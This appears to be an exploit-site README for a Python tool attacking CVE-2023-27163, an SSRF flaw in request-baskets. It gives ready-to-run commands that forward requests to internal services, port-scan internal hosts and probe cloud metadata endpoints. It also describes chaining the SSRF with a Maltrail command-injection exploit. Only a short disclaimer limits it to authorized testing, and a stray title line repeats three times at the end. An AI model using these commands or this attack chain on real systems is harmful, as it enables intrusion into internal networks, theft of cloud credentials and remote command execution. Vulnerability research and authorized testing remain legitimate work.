Share
## https://sploitus.com/exploit?id=030FE3D9-F1D8-5F29-8C56-75FB0A0EF056
# CVE-2023-27163 โ€” request-baskets SSRF Exploit

I wrote this exploit to target **CVE-2023-27163**, a Server-Side Request Forgery (SSRF) vulnerability found in `request-baskets` versions โ‰ค 1.2.1. The flaw lives in the `/api/baskets/{name}` endpoint, where the `forward_url` parameter allows an attacker to make the server issue arbitrary HTTP requests on their behalf.

## How it works

The exploit creates a malicious "basket" configured with a `forward_url` pointing to an internal target. Any request made to that basket's endpoint is forwarded by the server to the specified URL, effectively turning the server into an SSRF proxy.

## Features

- SSRF request forwarding to any internal or external URL
- Port scanning on internal hosts via HTTP probe
- Cloud metadata endpoint probing (AWS, GCP, Azure, DigitalOcean, Alibaba)
- Common internal service discovery
- Configurable basket profiles (proxy, insecure TLS, path expansion)

## Requirements

- Python 3.6+
- `requests` library (`pip install requests`)

## Usage

```
usage: exploit.py [-h] -t TARGET [-f FORWARD_URL] [--proxy-response]
                  [--insecure-tls] [--no-expand-path] [--capacity CAPACITY]
                  [--scan-host SCAN_HOST] [--ports PORTS] [--scan]
                  [--discover] [--cloud-metadata] [--timeout TIMEOUT]
                  [--delay DELAY]
```

### Examples

```bash
# Basic SSRF forward to an internal service
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80/admin

# Port scan an internal host
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 127.0.0.1 --scan

# Probe cloud metadata endpoints
python3 exploit.py -t http://192.168.1.100:55555 --cloud-metadata

# Proxy mode (returns the forwarded response body)
python3 exploit.py -t http://192.168.1.100:55555 -f http://127.0.0.1:80 --proxy-response

# Custom port range scan
python3 exploit.py -t http://192.168.1.100:55555 --scan-host 10.0.0.2 \
         --ports 80,443,3000,5000,8000,8080,9000
```

## Disclaimer

I built this tool for educational purposes and authorized security testing only. Do not use it against systems without explicit permission.

---

## Chain with

This SSRF exploit can be used as an initial entry point to reach internal services that are not directly exposed. I designed it to work alongside the [Maltrail-v0.53-Exploit]() โ€” the SSRF tunnel allows you to hit a Maltrail instance running on localhost and trigger the command injection through it.# CVE-2023-27163-exploit
# CVE-2023-27163-exploit
# CVE-2023-27163-exploit